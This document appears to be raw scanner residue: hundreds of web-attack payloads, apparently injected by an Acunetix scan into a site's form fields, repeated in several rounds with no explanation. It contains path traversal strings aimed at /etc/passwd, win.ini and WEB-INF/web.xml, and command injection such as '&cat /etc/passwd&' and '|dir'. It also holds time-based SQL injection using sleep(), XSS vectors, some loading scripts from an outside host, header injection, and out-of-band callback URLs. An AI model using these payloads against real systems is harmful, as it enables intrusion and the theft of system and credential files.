\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acu8868\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8868

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acux9773\xc0\xbez1\xc0\xbcz2a\x90bcxuca9773

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(997361)</ScRiPt>

1

1

1<script>prompt(957019)</script>

1

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(956625)</ScRiPt>

1

1

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942340></ScRiPt>

response.write(9963238*9776095)

1

1

1<ScRiPt >prompt(976243)</ScRiPt>

1

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

'+response.write(9963238*9776095)+'

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(998276)">

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9963238*9776095)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921478)"></g></svg>

1

../../../../../../../../../../etc/passwd.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(978382))>

1

1

cat /etc/passwd

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99070+100175}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(915920)>

1

1&n941281=v959801

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1

)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903892)>

1

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

1

!(()&&!|*|*|

-1)

1<img src=xyz OnErRor=prompt(957657)>

"|"ld

/etc/passwd

1

1

-1))

1<img/src=">" onerror=alert(950023)>

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1<ScRiPt%20>prompt(955452)</sCripT>

E274Ytjf'

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

KHXPvW7L')

1&lt

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

kmlDw1Ft'))

1

acunetix_wvs_invalid_filename

http://hite1kLuhFeJd.bxss.me/

\xf6<img acu onmouseover=prompt(991875) //\xf6>

1

1

||cat /etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1

1<input autofocus onfocus=prompt(956955)>

&dir

1

file:///etc/passwd

comments

1

1

http://www.acunetix.tst

-1)

/\../\../\../\../\../\../\../etc/passwd

1

'&dir&'

'"

<a href='http://www.acunetix.com'>website security</a>

comments/.

1

1'"()&%<ScRiPt >prompt(977214)</ScRiPt>

WEB-INF/web.xml

1

<!--

1

1

"&dir&"

WEB-INF\web.xml

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

'"()&%<ScRiPt >prompt(948479)</ScRiPt>

1

|dir

1

1

1_907068

1_gJzvZ <ScRiPt >prompt(919969)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

IEazw013'

'|dir

1

1

1

1

../../../../../../../../../../boot.ini

GbFCgMqG')

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

acu7812\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7812

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

4ydfjQQl'))

1

1

acux2047\xc0\xbez1\xc0\xbcz2a\x90bcxuca2047

1

1

1

................windowswin.ini

1<ScRiPt >prompt(910244)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(996408)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(908262)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953348></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(903996)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(999922)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988724)"></g></svg>

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(978333))>

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

1

1

1

1<body onload=prompt(917819)>

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951395)>

1

1

response.write(9235758*9760167)

1

1

1<img src=xyz OnErRor=prompt(998359)>

'+response.write(9235758*9760167)+'

1

1

&cat /etc/passwd&

1

1<img/src=">" onerror=alert(928663)>

1

"+response.write(9235758*9760167)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

1<ScRiPt%20>prompt(908161)</sCripT>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(8.61),0)/*'XOR(if(now()=sysdate(),sleep(8.61),0))OR'"XOR(if(now()=sysdate(),sleep(8.61),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(942723) //\xf6>

(select(0)from(select(sleep(8.61)))v)/*'+(select(0)from(select(sleep(8.61)))v)+'"+(select(0)from(select(sleep(8.61)))v)+"*/

cat /etc/passwd

1

1

1

-1

1<input autofocus onfocus=prompt(951169)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

1

`cat /etc/passwd`

-1)

1

${99605+99442}

<a href='http://www.acunetix.com'>website security</a>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

[url=http://www.acunetix.com]website security[/url]

1

3GleL6Yg'

'|'ld

7rRegCW7'

1

[url=http://www.acunetix.com]website security[/url]

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1&n989644=v914673

)

1

u8RgKYfg')

1

[url=http://www.acunetix.com]website security[/url]

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1&n989644=v914673

u28iIAF1')

)

1

1

)

1&n989644=v914673

1some_inexistent_file_with_long_name%00.jpg

1_IxYYk <ScRiPt >prompt(915372)</ScRiPt>

1

!(()&&!|*|*|

1

FKC8pDKm'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

testasp.vulnweb.com

-1

1

'"()

1

1

'

/etc/passwd

'

1

1

1

-1)

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1))

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitSQJPjKvycN.bxss.me/

Pp7uWjhv'

1

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

bVoT88Ru')

acunetix_wvs_invalid_filename

1

'&dir&'

1

1

1

4UxXNUOK'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

comments

http://www.acunetix.tst

1

file:///etc/passwd

1

"&dir&"

1'"()&%<ScRiPt >prompt(952047)</ScRiPt>

1

<!--

comments

1

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

'"()&%<ScRiPt >prompt(941196)</ScRiPt>

1

1

comments/.

1

1

'|dir

1_922283

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu1231\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1231

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux7628\xc0\xbez1\xc0\xbcz2a\x90bcxuca7628

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(976659)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(940915)</script>

1

1

1<ScRiPt >prompt(987738)</ScRiPt>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998519></ScRiPt>

1

1

1<ScRiPt >prompt(998343)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9293424*9106177)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(991064)">

1

'+response.write(9293424*9106177)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965705)"></g></svg>

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9293424*9106177)+"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(901658))>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

WEB-INF/web.xml

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(973097)>

WEB-INF\web.xml

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99480+100034}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929404)>

1

|cat /etc/passwd#

-1

1

1

1<img src=xyz OnErRor=prompt(921378)>

1&n910515=v988267

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1)

'|'ld

1

1<img/src=">" onerror=alert(980702)>

1some_inexistent_file_with_long_name%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<ScRiPt%20>prompt(981060)</sCripT>

"|"ld

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

!(()&&!|*|*|

cH8Zjm0m'

testasp.vulnweb.com

1

1&lt

^(#$!@#$)(()))******

/etc/passwd

1

1

'

HrPluko5')

1

\xf6<img acu onmouseover=prompt(901421) //\xf6>

1

'

1

l4aa46Ov'))

1

"

1

1<input autofocus onfocus=prompt(958184)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

-1)

acunetix_wvs_invalid_filename

http://hitu01Ysl82Ee.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

&dir

-1))

comments

1

1

1

1

1_0jB4W <ScRiPt >prompt(978380)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

JOyYcjEK'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

6MwPWJDf')

"&dir&"

1

1

file:///etc/passwd

'"

1

1

comments/.

1

|dir

1

1

A5THyv6U'))

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1'"()&%<ScRiPt >prompt(978374)</ScRiPt>

1

'|dir

1

WEB-INF/web.xml

1

1

"|dir

1

'"()&%<ScRiPt >prompt(936157)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

1

1_986136

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

acu5810\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5810

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux4508\xc0\xbez1\xc0\xbcz2a\x90bcxuca4508

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(986922)</ScRiPt>

1

1

1

1<script>prompt(902419)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(980167)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934390></ScRiPt>

1

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(961741)</ScRiPt>

1

1

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(979062)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939923)"></g></svg>

1

1

1<div style=width:expression(prompt(971749))>

1

1

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(994165)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945981)>

1

1<img src=xyz OnErRor=prompt(943082)>

1

1<img/src=">" onerror=alert(996347)>

1

1<ScRiPt%20>prompt(989261)</sCripT>

1

1&lt

\xf6<img acu onmouseover=prompt(909468) //\xf6>

1

1<input autofocus onfocus=prompt(900905)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_wvDYX <ScRiPt >prompt(976865)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9022529*9849073)

1

&cat /etc/passwd&

1

'+response.write(9022529*9849073)+'

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9022529*9849073)+"

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

`cat /etc/passwd`

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

${99297+99903}

|cat /etc/passwd#

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1&n907487=v968232

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1some_inexistent_file_with_long_name%00.jpg

1

-1)

"|"ld

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

testasp.vulnweb.com

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

"

/etc/passwd

5J5gIkDS'

1

1

'

${@print(md5(acunetix_wvs_security_test))}

1

1

qCfOOeB6')

"

1

http://hitXv5CJtu9vf.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

t9orvrED'))

1

acunetix_wvs_invalid_filename

1

1

1

||cat /etc/passwd

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

-1)

1

comments

'"

http://www.acunetix.tst

1

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

comments/.

1'"()&%<ScRiPt >prompt(963610)</ScRiPt>

<!--

1

KaTIMiQn'

1

1

"&dir&"

1

lokYCLwo')

1

'"()&%<ScRiPt >prompt(930648)</ScRiPt>

1

O682Q8gU'))

1

file:///etc/passwd

1

1_955347

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

WEB-INF/web.xml

"|dir

1

1

WEB-INF\web.xml

1

1

acu9091\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9091

../../../../../../../../../../windows/win.ini

1

acux10548\xc0\xbez1\xc0\xbcz2a\x90bcxuca10548

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(978539)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(984152)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

response.write(9567765*9623601)

1<ScRiPt >prompt(934946)</ScRiPt>

1

1

&cat /etc/passwd&

1

................windowswin.ini

'+response.write(9567765*9623601)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915897></ScRiPt>

1

'&cat /etc/passwd&'

1<ScRiPt >prompt(912147)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

"+response.write(9567765*9623601)+"

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<video><source onerror="javascript:prompt(956962)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(941234)"></g></svg>

1

cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(957645))>

1

`cat /etc/passwd`

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

|cat /etc/passwd#

1

1<body onload=prompt(907773)>

1

${100159+99193}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948986)>

'|'ld

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1<img src=xyz OnErRor=prompt(979914)>

1&n914417=v991554

WEB-INF\web.xml

1

"|"ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(998419)>

)

-1))

1

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

NjD8s3rB'

'"()

!(()&&!|*|*|

1<ScRiPt%20>prompt(958339)</sCripT>

'

xcnCubwi')

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1&lt

^(#$!@#$)(()))******

1

"

2akjSR6E'))

\xf6<img acu onmouseover=prompt(912939) //\xf6>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<input autofocus onfocus=prompt(999572)>

1

||cat /etc/passwd

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

&dir

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

1

http://hitgLOVx3WtuK.bxss.me/

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

EKyp0gb7'

1

1_Zy9Np <ScRiPt >prompt(986671)</ScRiPt>

1

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

zm4h0eRY')

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

|dir

1

1

1

1

1

http://www.acunetix.tst

aTsVoSfm'))

comments

1

1

1

'|dir

'"

comments/.

1

1'"()&%<ScRiPt >prompt(905702)</ScRiPt>

file:///etc/passwd

1

<!--

1

1

1

"|dir

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(970247)</ScRiPt>

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1_924155

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu8865\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8865

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux3136\xc0\xbez1\xc0\xbcz2a\x90bcxuca3136

1

1

1<ScRiPt >prompt(925627)</ScRiPt>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(992949)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(907313)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983725></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9872732*9587977)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(924536)</ScRiPt>

1

1

'+response.write(9872732*9587977)+'

../../../../../../../../../../etc/passwd

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(939912)">

1

"+response.write(9872732*9587977)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921566)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1

1

1<div style=width:expression(prompt(998918))>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<iframe src='data:text/html

1

1

1

cat /etc/passwd

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<body onload=prompt(996828)>

1

1

`cat /etc/passwd`

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

${99028+99673}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963901)>

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1<img src=xyz OnErRor=prompt(994066)>

'|'ld

HVWc3ksF'

1

1

1

1<img/src=">" onerror=alert(939986)>

1&n934468=v966042

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

"|"ld

zo2qDzDj')

1

)

1<ScRiPt%20>prompt(912707)</sCripT>

1

cQj7nzlM'))

1

/etc/passwd

1some_inexistent_file_with_long_name%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

!(()&&!|*|*|

1&lt

'"()

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

\xf6<img acu onmouseover=prompt(905342) //\xf6>

'

^(#$!@#$)(()))******

testasp.vulnweb.com

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

1

-1))

1

1<input autofocus onfocus=prompt(922740)>

"

1

1

E8TGOv8s'

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hitzLI2mMfldl.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

9ZOZUorP')

1

1

comments

&dir

1

[url=http://www.acunetix.com]website security[/url]

rVOzGeGc'))

